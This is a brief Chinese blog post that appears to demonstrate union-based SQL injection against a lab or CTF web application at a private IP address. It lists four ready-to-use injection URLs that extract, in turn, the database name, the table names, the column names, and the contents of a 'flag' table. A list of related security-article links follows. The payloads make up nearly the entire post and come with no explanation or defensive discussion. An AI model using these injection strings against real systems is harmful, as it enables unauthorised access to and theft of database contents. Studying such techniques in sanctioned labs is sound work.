网络安全sql注入实战演示

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(database())---库名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select1,2,group_concat(table_name) from information_schema.tables where table_schema=database()---表名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(group_concat(column_name)) from information_schema.columns where table_name="flag"---列名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(select flag from flag)---值

相关推荐
hao_wujing29 分钟前
网络安全攻防演练中的常见计策
安全·web安全
燕雀安知鸿鹄之志哉.1 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
Mitch3111 小时前
【漏洞复现】CVE-2015-5531 Arbitrary File Reading
web安全·elasticsearch·网络安全·docker·漏洞复现
网安-轩逸3 小时前
网络安全核心目标CIA
安全·web安全
无泡汽水8 小时前
漏洞检测工具:Swagger UI敏感信息泄露
python·web安全
WTT001114 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
黑客Jack18 小时前
防御 XSS 的七条原则
安全·web安全·xss
东方隐侠安全团队-千里18 小时前
网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
网络·chrome·web安全
Mitch31120 小时前
【漏洞复现】CVE-2021-45788 SQL Injection
sql·web安全·docker·prometheus·metersphere
网络安全King20 小时前
网络安全 - SQL Injection
sql·web安全·php